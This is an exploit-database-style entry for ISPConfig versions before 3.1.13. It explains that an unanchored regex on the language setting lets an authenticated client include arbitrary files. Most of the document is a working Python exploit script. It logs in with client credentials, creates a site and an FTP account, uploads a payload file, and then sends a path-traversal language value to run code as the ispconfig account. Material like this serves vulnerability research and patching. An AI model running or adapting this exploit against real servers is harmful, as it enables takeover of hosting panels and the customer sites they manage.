# Title: ISPConfig < 3.1.13 - Remote Command Execution
# Author: 0x09AL
# Date: 20/08/2018
# Vendor: https://www.ispconfig.org/
#
# Vulnerability Description
#
# There is an include on almost all the php files, which includes the language template.
# For example:
# In password_reset.php - Line 46 the following code tries to include the filename
# that is specified in the $_SESSION['s']['language'] variable.
#
# include ISPC_ROOT_PATH.'/web/login/lib/lang/'.$_SESSION['s']['language'].'.lng';
#
# Searching a little bit where the $_SESSION['s']['language'] variable is set we can find a reference in user_settings.php
# if(preg_match('/[a-z]{2}/',$_POST['language'])) {
# $_SESSION['s']['user']['language'] = $_POST['language'];
# $_SESSION['s']['language'] = $_POST['language'];
# } else {
# $app->error('Invalid language.');
# }
#
# The regex checks if the language contains two lower-case characters.
# The problem is that everything that contains two [a-z] characters will match the regex.
# Developer probably missed the ^ $ on the regex to match the entire file.
#
# Since in the new versions of php we can not use null byte injections, either a path-truncation attack
# we can create a ftp-account, upload the file we want to include with .lng extension at our path and the code
# will get executed as the ispconfig account and not as our chroot-ed account.
#
# This exploit can be triggered by having clients credentias , and exploiting this vulnerability we can compromise
# the entire clients.
#
# You need to specify the hostname:port , username, and password of the client.
import requests
import ftplib
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
host = "host:8080"
username = "username"
password = "password"
exp = requests.session()
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
ftp_username = "randomusr1"
domain = "pwned.com"
site_id = 1
payload_name = "pwned1"
path = ""
def login():
r = exp.post('https://%s/login/index.php' % host,data={'username':username,'password':password,'s_mod':'login','s_pg':'index'},verify=False)
if(r.text.find("wrong")>0):
print "[-] Incorrect credentials [-]"
else:
print "[+] Logged in Succesfully [+]"
def createSite():
r = exp.get('https://%s/sites/web_vhost_domain_edit.php' % host,verify=False)
_csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
_csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
r = exp.post('https://%s/sites/web_vhost_domain_edit.php' % host,data={'server_id':1,'ip_address':'*','ipv6_address':'','domain':'%s' % domain,'hd_quota':1024,'traffic_quota':1024,'subdomain':'www','php':'no','fastcgi_php_version':'','active':'y','id':'','_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
pass
def createFtp():
global site_id
r = exp.get('https://%s/sites/ftp_user_edit.php' % host,verify=False)
print "[+] Getting IDSof the sites [+]"
temp_array = r.text.split('<option value=')
nr_sites = len(temp_array)
print "[+] Number of sites %d [+]" % (int(nr_sites) - 1)
# Find the latest created site by checking the ID.
max_id = -9999
for i in range(1,nr_sites):
temp = int(temp_array[i].split('>')[0].replace("'",""))
if(temp > max_id):
max_id = temp
site_id = max_id
print "[+] Newly created site id is : %d [+]" % site_id
_csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
_csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
r = exp.post('https://%s/sites/ftp_user_edit.php' % host,data={'parent_domain_id':site_id,'username':'%s' % ftp_username,'password':'%s' % password,'repeat_password':'%s' % password,'quota_size':1024,'active':'y','id':'','_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
print "[+] Created FTP Account [+]"
pass
def uploadPayload():
ftp = ftplib.FTP(host.split(":")[0])
ftp.login(username+ftp_username, password)
ftp.cwd("web")
ftp.storlines("STOR %s.lng" % payload_name,open("test.txt"))
print "[+] Payload %s uploaded Succesfully [+]" % payload_name
pass
def waitTillCreation():
while 1:
print "[+] Trying [+]"
r = exp.get('https://%s/datalogstatus.php' % host,verify=False)
temp = json.loads(r.text)
if(temp["count"] == 0):
print "[+] Everything created .... [+]"
return
time.sleep(5)
def getRelativePath():
global path
r = exp.get('https://%s/sites/web_vhost_domain_edit.php?id=%d&type=domain' % (host,site_id),verify=False)
path = r.text.split('Document Root</label>')[1].split('<div class="col-sm-9">')[1].split('<')[0]
path += "/web/" + payload_name
print "[+] Uploading payload in %s [+]" % path
def triggerVuln():
r = exp.get('https://%s/tools/user_settings.php' % host,verify=False)
_csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
_csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
user_id = r.text.split('name="id" value="')[1].split('"')[0]
r = exp.post('https://%s/tools/user_settings.php' % host,data={'passwort':'','repeat_password':'','language':'../../../../../../../../../../../../../..%s' % path,'id':'%s' % user_id,'_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
r = exp.get('https://%s/index.php'% host,verify=False)
print r.text
login()
createSite()
createFtp()
getRelativePath()
waitTillCreation()
uploadPayload()
triggerVuln()
